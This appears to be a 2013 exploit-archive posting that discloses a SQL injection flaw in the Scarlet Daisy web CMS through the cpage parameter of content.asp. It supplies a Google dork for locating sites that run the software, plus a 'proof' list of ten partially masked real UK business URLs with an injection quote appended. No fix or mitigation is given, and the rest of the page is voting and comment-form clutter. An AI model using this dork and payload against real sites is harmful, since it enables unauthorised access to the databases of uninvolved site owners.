scarletdaisy Sql injection vulnerability

2013.08.31

Credit: Ashiyane Digital Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:\" Powered by Scarlet Daisy Web Content Management System.\"

#********************************************************************************
# Exploit Title : scarletdaisy Sql injection vulnerability
#
# Software link : www.scarletdaisy.com
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:" Powered by Scarlet Daisy Web Content Management System."
#
# Date: 2013/08/31
#
--------------------------------------------------------------------
# - Location : [Target]/content.asp?cpage=[Sql Injection]
#
# Proof:
#
# http://www.bXXXc.co.uk/content.asp?cpage=1'
#
# http://www.claXXXomes.co.uk/content.asp?cpage=1'
#
# http://www.handmXXbyhenry.co.uk/content.asp?cpage=1'
#
# http://www.haXXXrage.co.uk/content.asp?cpage=1'
#
# http://www.papirXXXky.co.uk/content.asp?cpage=1'
#
# http://longleyXXXystore.co.uk/content.asp?cpage=1'
#
# http://www.morrXXXndwright.co.uk/content.asp?cpage=1'
#
# http://www.campbXXrage.co.uk/content.asp?cpage=1'
#
# http://www.gardnerXXXery.co.uk/content.asp?cpage=1'
#
# http://www.wizarXX.co.uk/content.asp?cpage=1'
#
######################
discovered by : ACC3SS
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

scarletdaisy Sql injection vulnerability

Dork: intext:\" Powered by Scarlet Daisy Web Content Management System.\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.